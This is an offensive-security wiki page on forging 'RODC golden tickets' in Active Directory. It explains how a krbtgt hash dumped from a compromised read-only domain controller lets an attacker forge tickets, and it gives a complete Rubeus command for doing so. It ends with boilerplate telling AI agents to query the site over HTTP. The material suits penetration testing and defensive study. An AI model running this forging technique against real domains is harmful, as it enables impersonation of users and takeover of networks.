# RODC Golden tickets

## Theory

With administrative access to an [RODC](/ad/movement/domain-settings/rodc.md), it is possible to dump all the cached credentials, including those of the`krbtgt_XXXXX` account. The hash can be used to forge a "RODC golden ticket" for any account in the `msDS-RevealOnDemandGroup` and not in the `msDS-NeverRevealGroup` attributes of the RODC. This ticket can be presented to the RODC or any accessible standard writable Domain Controller to request a Service Ticket (ST).

{% hint style="info" %}
When presenting a RODC golden ticket to a writable (i.e. standard) Domain Controller, it is not worth crafting the PAC because it will be recalculated by the writable Domain Controller when issuing a service ticket (ST).
{% endhint %}

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
For the moment, from UNIX-like systems no tool is available to only forge a RODC Golden Ticket.
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used for this purpose.

{% code overflow="wrap" %}

```powershell
Rubeus.exe golden /rodcNumber:$KBRTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
```

{% endcode %}
{% endtab %}
{% endtabs %}

> The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the *kvno* field of the ticket.
>
> *(By Elad Shamir on* [*specterops.io*](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06)*)*

## Resources

{% embed url="<https://adsecurity.org/?p=3592>" %}

{% embed url="<https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://red.infiltr8.io/ad/movement/kerberos/forged-tickets/rodc-golden-tickets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.